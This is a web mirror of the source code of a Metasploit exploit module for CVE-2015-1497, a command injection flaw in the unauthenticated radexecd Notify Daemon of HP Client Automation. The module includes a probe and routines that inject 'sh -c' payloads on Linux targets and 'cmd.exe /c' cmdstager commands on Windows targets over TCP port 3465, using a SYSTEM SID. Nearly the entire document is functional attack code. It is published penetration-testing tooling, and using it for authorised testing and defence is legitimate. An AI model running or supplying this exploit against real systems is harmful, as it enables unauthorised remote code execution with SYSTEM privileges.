Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::CmdStager

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'HP Client Automation Command Injection',

17
        'Description' => %q{

18
          This module exploits a command injection vulnerability on HP Client Automation, distributed

19
          actually as Persistent Systems Client Automation. The vulnerability exists in the Notify

20
          Daemon (radexecd.exe), which doesn't authenticate execution requests by default.

21


22
          This module has been tested successfully on HP Client Automation 9.00 on Windows 2003 SP2

23
          and CentOS 5.

24
        },

25
        'Author' => [

26
          'Ben Turner', # Vulnerability discovery

27
          'juan vazquez' # Metasploit module

28
        ],

29
        'References' => [

30
          ['CVE', '2015-1497'],

31
          ['ZDI', '15-038'],

32
          ['URL', 'https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features']

33
        ],

34
        'Privileged' => true,

35
        'Platform' => %w{unix win},

36
        'DefaultOptions' => {

37
          'WfsDelay' => 10

38
        },

39
        'Payload' => { 'DisableNops' => true },

40
        'Targets' => [

41
          [

42
            'HP Client Automation 9.0.0 / Linux',

43
            {

44
              'Platform' => 'unix',

45
              'Arch' => ARCH_CMD,

46
              'Payload' =>

47
                {

48
                  'Space' => 466,

49
                  'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,

50
                  'Compat' =>

51
              {

52
                'PayloadType' => 'cmd',

53
                'RequiredCmd' => 'openssl telnet generic gawk'

54
              },

55
                  'BadChars' => "\x27"

56
                }

57
            }

58
          ],

59
          [

60
            'HP Client Automation 9.0.0 / Windows',

61
            {

62
              'Platform' => 'win',

63
              'Arch' => ARCH_X86

64
            }

65
          ]

66
        ],

67
        'DefaultTarget' => 0,

68
        'DisclosureDate' => '2014-01-02',

69
        'Notes' => {

70
          'Reliability' => UNKNOWN_RELIABILITY,

71
          'Stability' => UNKNOWN_STABILITY,

72
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

73
        }

74
      )

75
    )

76


77
    register_options(

78
      [

79
        Opt::RPORT(3465)

80
      ]

81
    )

82


83
    deregister_options('CMDSTAGER::FLAVOR')

84
    deregister_options('CMDSTAGER::DECODER')

85
  end

86


87
  def check

88
    connect

89
    sock.put("\x00") # port

90
    sock.put("#{rand_text_alphanumeric(4 + rand(3))}\x00") # user ID

91
    sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password

92
    sock.put("hide\x00") # command

93
    res = sock.get_once

94
    disconnect

95


96
    if res && res.unpack('C')[0] == 0

97
      return Exploit::CheckCode::Detected

98
    end

99


100
    Exploit::CheckCode::Safe

101
  end

102


103
  def exploit

104
    case target['Platform']

105
    when 'win'

106
      print_status('Exploiting Windows target...')

107
      execute_cmdstager({ :flavor => :vbs, :linemax => 290 })

108
    when 'unix'

109
      print_status('Exploiting Linux target...')

110
      exploit_unix

111
    else

112
      fail_with(Failure::NoTarget, 'Invalid target')

113
    end

114
  end

115


116
  def exploit_unix

117
    connect

118
    sock.put("\x00") # port

119
    sock.put("0\x00") # user ID

120
    sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password

121
    sock.put("hide hide\x09sh -c '#{payload.encoded.gsub(/\\/, "\\\\\\\\")}'\x00") # command, here commands can be injected

122
    disconnect

123
  end

124


125
  def execute_command(cmd, opts = {})

126
    connect

127
    sock.put("\x00") # port

128
    sock.put("S-1-5-18\x00") # user ID

129
    sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password

130
    sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected

131
    res = sock.get_once

132
    disconnect

133
    unless res && res.unpack('C')[0] == 0

134
      fail_with(Failure::Unknown, "Something failed executing the stager...")

135
    end

136
  end

137
end

138


139